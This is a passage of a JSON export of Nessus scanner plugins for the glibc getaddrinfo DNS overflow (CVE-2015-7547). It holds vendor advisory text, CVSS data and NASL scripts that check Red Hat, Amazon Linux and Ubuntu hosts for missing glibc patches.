reference:\"glibc-devel-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", reference:\"glibc-static-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-static-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-static-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"i686\", reference:\"nscd-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"s390x\", reference:\"nscd-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", sp:\"1\", reference:\"glibc-2.17-79.el7_1.4\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"glibc-common-2.17-79.el7_1.4\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"glibc-common-2.17-79.el7_1.4\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", reference:\"glibc-debuginfo-2.17-79.el7_1.4\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", reference:\"glibc-debuginfo-common-2.17-79.el7_1.4\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", reference:\"glibc-devel-2.17-79.el7_1.4\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"glibc-headers-2.17-79.el7_1.4\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-79.el7_1.4\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", reference:\"glibc-static-2.17-79.el7_1.4\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"glibc-utils-2.17-79.el7_1.4\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-79.el7_1.4\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"nscd-2.17-79.el7_1.4\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"nscd-2.17-79.el7_1.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:20:01", "description": "A stack-based buffer overflow flaw was found in the send_dg() and send_vc() functions, used by getaddrinfo() and other higher-level interfaces of glibc. A remote attacker able to cause an application to call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : glibc (ALAS-2016-653)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2019-04-11T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:glibc", "p-cpe:/a:amazon:linux:glibc-common", "p-cpe:/a:amazon:linux:glibc-debuginfo", "p-cpe:/a:amazon:linux:glibc-debuginfo-common", "p-cpe:/a:amazon:linux:glibc-devel", "p-cpe:/a:amazon:linux:glibc-headers", "p-cpe:/a:amazon:linux:glibc-static", "p-cpe:/a:amazon:linux:glibc-utils", "p-cpe:/a:amazon:linux:nscd", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-653.NASL", "href": "https://www.tenable.com/plugins/nessus/88756", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-653.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88756);\n script_version(\"2.13\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"ALAS\", value:\"2016-653\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"Amazon Linux AMI : glibc (ALAS-2016-653)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A stack-based buffer overflow flaw was found in the send_dg() and\nsend_vc() functions, used by getaddrinfo() and other higher-level\ninterfaces of glibc. A remote attacker able to cause an application to\ncall either of these functions could use this flaw to execute\narbitrary code with the permissions of the user running the\napplication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aws.amazon.com/amazon-linux-ami/faqs/#auto_update\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-653.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update glibc' to update your system. Note that you may need\nto run 'yum clean all' first. Once this update has been applied,\n'reboot your instance to ensure that all processes and daemons that\nlink against glibc are using the updated version'. On new instance\nlaunches prior to Amazon Linux AMI 2015.09.2, you should still reboot\nafter cloud-init has automatically applied this update.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"glibc-2.17-106.166.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-common-2.17-106.166.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.17-106.166.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.17-106.166.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.17-106.166.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.17-106.166.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-static-2.17-106.166.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.17-106.166.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"nscd-2.17-106.166.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:20:02", "description": "It was discovered that the GNU C Library incorrectly handled receiving responses while performing DNS resolution. A remote attacker could use this issue to cause the GNU C Library to crash, resulting in a denial of service, or possibly execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 15.10 : eglibc, glibc vulnerability (USN-2900-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libc6", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.10"], "id": "UBUNTU_USN-2900-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88806", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2900-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88806);\n script_version(\"2.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"USN\", value:\"2900-1\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 15.10 : eglibc, glibc vulnerability (USN-2900-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the GNU C Library incorrectly handled receiving\nresponses while performing DNS resolution. A remote attacker could use\nthis issue to cause the GNU C Library to crash, resulting in a denial\nof service, or possibly execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2900-1/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected libc6 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 15.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libc6\", pkgver:\"2.15-0ubuntu10.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libc6\", pkgver:\"2.19-0ubuntu6.7\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"libc6\", pkgver:\"2.21-0ubuntu4.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libc6\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:20:10", "description": "Updated glibc packages that fix one security issue and two bugs are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library performed dual A/AAAA DNS queries. A remote attacker could create a specially crafted DNS response which could cause libresolv to crash or, potentially, execute code with the permissions of the user running the library. Note: this issue is only exposed when libresolv is called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs :\n\n* The dynamic loader has been enhanced to allow the loading of more shared libraries that make use of static thread local storage. While static thread local storage is the fastest access mechanism it may also prevent the shared library from being loaded at all since the static storage space is a limited and shared process-global resource.\nApplications which would previously fail with 'dlopen: cannot load any more object with static TLS' should now start up correctly.\n(BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or certain timer API calls to fail and return errors in the presence of large thread-local storage data that exceeded PTHREAD_STACK_MIN in size (generally 16 KiB). The bug in librt has been corrected and the impacted APIs no longer return errors when large thread-local storage data is present in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages, which contain backported patches to correct these issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "type": "nessus", "title": "RHEL 6 : glibc (RHSA-2016:0175)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.7"], "id": "REDHAT-RHSA-2016-0175.NASL", "href": "https://www.tenable.com/plugins/nessus/88784", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0175. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88784);\n script_version(\"2.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0175\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"RHEL 6 : glibc (RHSA-2016:0175)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue and two bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs :\n\n* The dynamic loader has been enhanced to allow the loading of more\nshared libraries that make use of static thread local storage. While\nstatic thread local storage is the fastest access mechanism it may\nalso prevent the shared library from being loaded at all since the\nstatic storage space is a limited and shared process-global resource.\nApplications which would previously fail with 'dlopen: cannot load any\nmore object with static TLS' should now start up correctly.\n(BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of\nlarge thread-local storage data that exceeded PTHREAD_STACK_MIN in\nsize (generally 16 KiB). The bug in librt has been corrected and the\nimpacted APIs no longer return errors when large thread-local storage\ndata is present in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/2161461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 